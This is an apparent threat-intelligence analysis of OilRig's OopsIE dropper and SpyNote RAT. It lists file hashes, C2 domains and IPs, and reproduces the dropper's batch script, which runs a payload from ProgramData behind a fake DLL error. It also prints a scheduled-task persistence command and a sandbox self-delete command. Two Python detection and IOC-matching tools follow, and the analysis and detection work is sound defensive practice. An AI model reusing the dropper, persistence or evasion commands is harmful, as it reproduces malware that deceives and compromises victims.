Iranian APT group OilRig: OopsIE malware and SpyNote mobile malware

OopsIE dropper

MD5: fe466788a06fc5646bd52fe6732d59bf

SHA-1: b774c171b76c49be5b5efa9374c7d40f5000e184

Authentihash: 824b3bbc2604bd638b42d665c118ec687c7657bff4ff9b348b35036a42a3729d

Fake failure message (screenshot not reproduced; the text is the one echoed by the :commonexit block of the dropper script below).

Dropped batch script, C:\Users\admin\AppData\Local\Temp\ztmp\t23092.bat. It hides its working directory, uses reg query to learn whether .NET Framework 3.5 or 4.x is installed, copies the matching payload into C:\programdata and runs it (if neither version is found it skips straight to the exit), and finally displays a fake initialization error so the victim believes the lure simply failed:

@echo off
set ztmp=C:\Users\admin\AppData\Local\Temp\ztmp
set MYFILES=C:\Users\admin\AppData\Local\Temp\afolder
set bfcec=t23141.exe
attrib +h C:\Users\admin\AppData\Local\Temp\ztmp
@echo off

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5" /v version
if %errorlevel% equ 0 goto v3

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v version
if %errorlevel% equ 0 goto v4

goto commonexit

:v3
copy %MYFILES%\WinSyncMetastoreV2.exe C:\programdata\WinSyncMetastoreV2.exe
C:\programdata\WinSyncMetastoreV2.exe
goto commonexit

:v4
copy %MYFILES%\WinSyncMetastoreV4.exe C:\programdata\WinSyncMetastoreV4.exe
C:\programdata\WinSyncMetastoreV4.exe
goto commonexit

:commonexit
start "" /wait cmd /c "echo An error occurred during initialization of VpnSrv.dll in 00x41542178!&echo(&pause"
exit

Installation

Drops

OopsIE malware: WinSyncMetastore.exe (Unit 42 analysis: https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/)


WinSyncMetastoreV2.exe

MD5: 5998ef679682878e68d5ac4a1733fac5

SHA-256: 36e66597a3ff808acf9b3ed9bc93a33a027678b1e262707682a2fd1de7731e23

WinSyncMetastoreV4.exe

MD5: d41207d54b69fb3eeb7a104f7d36c7b0

SHA-256: 055b7607848777634b2b17a5c51da7949829ff88084c3cb30bcb3e58aae5d8e9

Persistence

A scheduled task named MicrosoftPrintDrive runs the dropped VBScript every three minutes:

cmd.exe /c SchTasks /Create /SC MINUTE /MO 3 /TN "MicrosoftPrintDrive" /TR "wscript C:\ProgramData\WinSyncMetastore.vbs" /f

C2:

defender-update.com

When the sample detects a sandbox it runs the following command, which uses choice with a two-second timeout as a sleep and then deletes the sample's own executable:

cmd.exe /C choice /C Y /N /D Y /T 2 & Del C:\Users\admin\Desktop\sampale.exe
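The dropper script, the scheduled task and the sandbox self-delete above all surface as process-creation events, so they can be hunted with a handful of command-line rules. The following Python is an added example (not code from the original write-up or from Unit 42) that encodes those observations as rules and runs them over constructed Sysmon Event ID 1 style records; the field names (image, command_line, parent_command_line) and the sample events are assumptions, and the rules are written slightly more generally than this one sample (any .exe launched from the root of ProgramData by a batch file in a Temp folder, any per-minute scheduled task whose action is wscript or cscript on a .vbs).

```python
"""Process-creation detections for the OopsIE dropper chain.

Added example, not from the original write-up. Field names and the sample
records below are assumptions; real Sysmon/4688 events need the same fields.
"""
import re
from typing import Callable, Dict, List, Tuple

Record = Dict[str, str]   # one process-creation event

# reg query against the .NET Framework install keys (what the .bat does first)
DOTNET_PROBE = re.compile(
    r"\breg(\.exe)?\s+query\s+\"?HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\",
    re.IGNORECASE)
# a batch file living under any ...\Temp\... path
TEMP_BAT = re.compile(r"\\Temp\\.*\.bat\b", re.IGNORECASE)
# an executable sitting directly in the root of ProgramData (the copy-and-run step)
PROGRAMDATA_ROOT_EXE = re.compile(r"^[a-z]:\\ProgramData\\[^\\]+\.exe$", re.IGNORECASE)
# schtasks /Create ... /SC MINUTE ... /TR "wscript|cscript <something>.vbs"
MINUTE_TASK_SCRIPT = re.compile(
    r"\bschtasks(\.exe)?\s+/create\b.*\s/sc\s+minute\b.*\s/tr\s+\"?[wc]script\b[^\"]*\.vbs",
    re.IGNORECASE)
# choice used as a timer, immediately followed by del (sandbox self-delete)
TIMED_SELF_DELETE = re.compile(
    r"\bchoice\s+/c\s+y\s+/n\s+/d\s+y\s+/t\s+\d+\s*&\s*del\b", re.IGNORECASE)
# the decoy "initialization of <x>.dll" error shown to the victim
FAKE_DLL_ERROR = re.compile(
    r"echo An error occurred during initialization of \S+\.dll", re.IGNORECASE)


def dotnet_probe_from_temp_bat(rec: Record) -> bool:
    return bool(DOTNET_PROBE.search(rec.get("command_line", ""))
                and TEMP_BAT.search(rec.get("parent_command_line", "")))


def payload_from_programdata(rec: Record) -> bool:
    return bool(PROGRAMDATA_ROOT_EXE.match(rec.get("image", ""))
                and TEMP_BAT.search(rec.get("parent_command_line", "")))


def minute_task_runs_script(rec: Record) -> bool:
    return bool(MINUTE_TASK_SCRIPT.search(rec.get("command_line", "")))


def timed_self_delete(rec: Record) -> bool:
    return bool(TIMED_SELF_DELETE.search(rec.get("command_line", "")))


def fake_dll_error(rec: Record) -> bool:
    return bool(FAKE_DLL_ERROR.search(rec.get("command_line", "")))


RULES: Dict[str, Callable[[Record], bool]] = {
    fn.__name__: fn for fn in (dotnet_probe_from_temp_bat, payload_from_programdata,
                               minute_task_runs_script, timed_self_delete, fake_dll_error)
}


def detect(records) -> List[Tuple[str, str]]:
    """Return (record id, rule name) for every rule that fires on every record."""
    return [(rec["id"], name) for rec in records for name, fn in RULES.items() if fn(rec)]


# Constructed sample telemetry: e* reproduce the chain above, b* are benign look-alikes.
BAT = r'cmd /c "C:\Users\admin\AppData\Local\Temp\ztmp\t23092.bat"'
SAMPLE_EVENTS = [
    {"id": "e1", "image": r"C:\Windows\System32\reg.exe", "parent_command_line": BAT,
     "command_line": r'reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5" /v version'},
    {"id": "e2", "image": r"C:\programdata\WinSyncMetastoreV4.exe", "parent_command_line": BAT,
     "command_line": r"C:\programdata\WinSyncMetastoreV4.exe"},
    {"id": "e3", "image": r"C:\Windows\System32\schtasks.exe", "parent_command_line": "cmd.exe",
     "command_line": r'SchTasks /Create /SC MINUTE /MO 3 /TN "MicrosoftPrintDrive" /TR "wscript C:\ProgramData\WinSyncMetastore.vbs" /f'},
    {"id": "e4", "image": r"C:\Windows\System32\cmd.exe", "parent_command_line": r"C:\Users\admin\Desktop\sampale.exe",
     "command_line": r"cmd.exe /C choice /C Y /N /D Y /T 2 & Del C:\Users\admin\Desktop\sampale.exe"},
    {"id": "e5", "image": r"C:\Windows\System32\cmd.exe", "parent_command_line": BAT,
     "command_line": r'cmd /c "echo An error occurred during initialization of VpnSrv.dll in 00x41542178!&echo(&pause"'},
    {"id": "b1", "image": r"C:\Windows\System32\reg.exe",
     "parent_command_line": r'cmd.exe /c "C:\Program Files\Vendor\install.cmd"',
     "command_line": r'reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" /v Release'},
    {"id": "b2", "image": r"C:\Windows\System32\schtasks.exe", "parent_command_line": "cmd.exe",
     "command_line": r'schtasks /Create /SC DAILY /ST 02:00 /TN "NightlyBackup" /TR "C:\Program Files\Backup\backup.exe"'},
]

if __name__ == "__main__":
    for rid, rule in detect(SAMPLE_EVENTS):
        print(f"{rid}: {rule}")
```

The .NET probe on its own is noisy (installers do it constantly), which is why that rule and the ProgramData rule require the parent to be a batch file under a Temp directory; the scheduled-task and choice-then-del rules are specific enough to stand alone.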

SpyNote Android malware

213.227.140.35, the IP address of defender-update.com, has also served as the command and control server for SpyNote, an off-the-shelf mobile RAT.

client.apk

MD5: 2820c84cf9f34fe999da0bcedea6915d

SHA-1: 0f3ae5c85151686b836fd95e2d680201679101e9

SHA-256: 9727b56953bb6622cc1d3a039e2ebf6ef260dd76c8dcc11f4a1320fbf294621d

102.apk

MD5: 27aaf0e49ebc240933ea5d1a04747977

SHA-1: c7e7ad6d763a41b8d3d7d9301acbe53674041d75

SHA-256: d7bebfd87066e34d2f68ddf39d5637afa978df72bceb8dc690ed1553cdfffa43

IOCs

Domains:

defender-update.com

windowspatch.com

herkhabar.com

IP addresses:

89.248.173.131

213.227.140.35:3210

178.32.211.5

File name:

Windows Implantment Module.exe

MD5 hashes:

d41207d54b69fb3eeb7a104f7d36c7b0

ea6321f55ea83e6f2887a2360f8e55b0

3cf8aff7c56cf477bde9adbd543abc40

fe466788a06fc5646bd52fe6732d59bf

27aaf0e49ebc240933ea5d1a04747977

5998ef679682878e68d5ac4a1733fac5

2820c84cf9f34fe999da0bcedea6915d
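Indicator lists like the one above rarely arrive clean: labels are glued to digests ("MD5fe46..."), a "SHA-256" label sits on one line with the digest on the next, a domain is regex-defanged, an IP carries a port. The following Python is an added example (not code from the original write-up) that normalises such lines, classifies each indicator by type, and looks them up in constructed DNS, flow and file-inventory records; the event field names and the sample events are assumptions made for the example, while the indicator lines are copied from this page.

```python
"""Normalise, classify and match the indicators listed above.

Added example, not part of the original write-up. Event field names and the
sample events are assumptions; the IOC lines are taken from the page.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

HEX = re.compile(r"^[0-9a-f]+$")
IPV4 = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})(?::\d{1,5})?$")
DOMAIN = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")
FILE_EXT = re.compile(r"\.(exe|dll|apk|vbs|bat)$")
HASH_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}
# Labels reports glue onto digests; longest first so "sha-256" is tried before "sha-1".
LABELS = ("authentihash", "sha-256", "sha256", "sha-1", "sha1", "md5")


def normalize(token: str) -> str:
    """Trim, lowercase and refang the common defanging styles ([.] (.) \\. hxxp)."""
    t = token.strip().lower()
    for defanged, real in (("[.]", "."), ("(.)", "."), ("\\.", "."), ("hxxp", "http")):
        t = t.replace(defanged, real)
    return t


def classify(token: str) -> Tuple[str, str]:
    """Return (ioc_type, normalised_value); ioc_type is 'unknown' if nothing fits."""
    t = normalize(token)
    for label in LABELS:                        # "md5fe46..." -> ("md5", "fe46...")
        digest = t[len(label):] if t.startswith(label) else ""
        if HEX.match(digest) and len(digest) in HASH_BY_LEN:
            kind = "authentihash" if label == "authentihash" else HASH_BY_LEN[len(digest)]
            return (kind, digest)
    if HEX.match(t) and len(t) in HASH_BY_LEN:  # bare digest: type by length
        return (HASH_BY_LEN[len(t)], t)
    m = IPV4.match(t)
    if m:                                       # "213.227.140.35:3210" -> "213.227.140.35"
        return ("ipv4", m.group(1))
    if FILE_EXT.search(t):                      # before DOMAIN: "client.apk" is not a domain
        return ("filename", t)
    if DOMAIN.match(t):
        return ("domain", t)
    return ("unknown", t)


def parse_ioc_lines(lines: Iterable[str]) -> Dict[str, Set[str]]:
    """Build {ioc_type: {values}}, joining a bare label line with the digest that follows it."""
    iocs: Dict[str, Set[str]] = defaultdict(set)
    pending_label = ""
    for raw in lines:
        t = normalize(raw)
        if not t:
            continue
        if t in LABELS:                         # "SHA-256" alone: digest is on a later line
            pending_label = t
            continue
        kind, value = classify(pending_label + t)
        pending_label = ""
        if kind != "unknown":
            iocs[kind].add(value)
    return dict(iocs)


# Telemetry field -> indicator type it is compared against (assumed schema).
FIELD_TYPES = {"domain": "domain", "dst_ip": "ipv4", "md5": "md5",
               "sha1": "sha1", "sha256": "sha256", "filename": "filename"}


def match_events(iocs: Dict[str, Set[str]], events) -> List[Tuple[str, str, str]]:
    """Return (event id, ioc type, value) for every field equal to a known indicator."""
    hits = []
    for ev in events:
        for field, kind in FIELD_TYPES.items():
            if field in ev:
                value = classify(str(ev[field]))[1]   # same normalisation as the IOC side
                if value in iocs.get(kind, set()):
                    hits.append((ev["id"], kind, value))
    return hits


# Indicator lines as they appear on this page (heading, fused labels, split SHA-256, defanging).
IOC_LINES = [
    "IOCs", "MD5fe466788a06fc5646bd52fe6732d59bf", "SHA-1b774c171b76c49be5b5efa9374c7d40f5000e184",
    "Authentihash824b3bbc2604bd638b42d665c118ec687c7657bff4ff9b348b35036a42a3729d",
    "SHA-256", "", "d7bebfd87066e34d2f68ddf39d5637afa978df72bceb8dc690ed1553cdfffa43",
    "defender-update\\.com", "windowspatch.com", "herkhabar.com",
    "89.248.173.131", "213.227.140.35:3210", "178.32.211.5",
    "Windows Implantment Module.exe", "client.apk", "d41207d54b69fb3eeb7a104f7d36c7b0",
]

# Constructed telemetry records (not real logs).
SAMPLE_EVENTS = [
    {"id": "dns-1", "host": "ws17", "domain": "Defender-Update.com"},
    {"id": "dns-2", "host": "ws17", "domain": "update.microsoft.com"},
    {"id": "flow-1", "host": "ws17", "dst_ip": "213.227.140.35", "dst_port": 3210},
    {"id": "flow-2", "host": "ws22", "dst_ip": "8.8.8.8", "dst_port": 53},
    {"id": "file-1", "host": "ws17", "filename": "WinSyncMetastoreV4.exe", "md5": "D41207D54B69FB3EEB7A104F7D36C7B0"},
    {"id": "file-2", "host": "ws22", "filename": "notepad.exe", "md5": "00000000000000000000000000000000"},
]

if __name__ == "__main__":
    for hit in match_events(parse_ioc_lines(IOC_LINES), SAMPLE_EVENTS):
        print(hit)
```

The Authentihash is kept as its own type rather than folded into sha256: it is a hash over the PE's signed regions, so it will never equal the SHA-256 of the file on disk and must not be compared against it.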

 

This article originally appeared on the WeChat public account 黑鸟.
